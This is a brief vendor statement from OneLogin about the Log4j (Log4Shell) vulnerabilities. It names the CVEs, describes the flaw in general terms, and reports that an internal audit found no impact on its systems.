A few days ago, a critical flaw was found in the Apache Log4j logging service (version 2.0.1 through to, but not including, version 2.15.0). These vulnerabilities (CVE-2021-44228, CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) allow attackers that can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when the message lookup substitution option is enabled.
We understand that our customers might be concerned about whether our systems are vulnerable to the Log4j flaw, and we wanted to share the following statement directly from our Engineering and Security teams.
OneLogin is aware of the Log4j flaw (also now known as “Log4Shell”), a zero-day vulnerability (CVE-2021-44228) that first came to light on December 9, 2021. We have performed an audit and security review of the relevant OneLogin technologies and are not aware of any impact at this time. OneLogin will continue to monitor the situation and assess the impact of developments that come to light.
As always we value Security First, and we are constantly striving to ensure that our systems and the data that you entrust with us is protected.